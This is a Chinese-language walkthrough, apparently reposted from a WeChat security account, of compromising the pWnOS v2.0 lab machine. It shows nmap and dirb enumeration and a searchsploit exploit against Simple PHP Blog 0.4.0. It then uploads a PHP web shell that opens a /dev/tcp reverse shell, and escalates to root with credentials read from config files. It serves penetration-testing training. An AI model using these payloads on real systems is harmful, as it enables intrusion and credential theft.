pWnOS v2.0
信息收集
发现主机
使用nmap扫描局域网内的存活主机:
nmap -sP 10.10.10.0/24
目标主机IP:10.10.10.100
端口扫描与服务识别
nmap -sV -p- 10.10.10.100
发现关键服务:
22/tcp:OpenSSH 5.8
80/tcp:Apache 2.2.17
Web渗透
初步访问网站
访问http://10.10.10.100/index.php,发现注册/登录功能
但注册登录后无可用信息。
枚举目录
使用dirb扫描隐藏路径:
dirb http://10.10.10.100/
发现另一个登录页面:http://10.10.10.100/blog/login
漏洞挖掘
访问http://10.10.10.100/blog/login网页,F12查看源码
通过页面源码确认系统为Simple PHP Blog 0.4.0。
使用searchsploit查找漏洞:
searchsploit Simple PHP Blog 0.4.0
1191.pl、16883.rb
选择1191.pl
searchsploit Simple PHP Blog 0.4.0 -m 1191.pl
安装依赖后执行
apt install libswitch-perl
查看使用说明
perl 1191.pl
执行文件
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U hacker -P hacker
成功创建用户hacker,密码hacker。
登录用户
hacker/hacker
登录成功,发现右边有文件上传
反弹Shell
php文件上传
<?php system("bash -c 'sh -i &>/dev/tcp/10.10.10.50/8888 0>&1'"); ?>
上传成功,但是没有显示路径
枚举上传路径
dirb http://10.10.10.100/blog/ -R -w
通过dirb扫描上传路径,确认文件位于:/blog/images/shell.php。
本地监听8888端口
nc -lvvp 8888
访问shell.php,触发Shell
获取交互式Shell
python -c 'import pty;pty.spawn("/bin/bash")'
权限提升
检查进程
发现MySQL以Root权限运行
ps -ef | grep root
root运行数据库:root 781 1 0 15:45 ? 00:00:01 /usr/sbin/mysqld
搜索配置文件
find /var -name "mysql*"
发现配置文件:
/var/www/mysqli_connect.php
/var/mysqli_connect.php
查看文件
cat /var/www/mysqli_connect.php
root凭证:root/goodday
cat /var/mysqli_connect.php
root凭证:root/root@ISIntS
登录ssh
ssh [email protected]
登录成功:root/root@ISIntS
提权完成
红队全栈教学
可在公众号回复“红队”获取群链接
OSCP+
原文始发于微信公众号(泷羽Sec-Ceo):靶场奇妙记之pWnOS v2.0
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论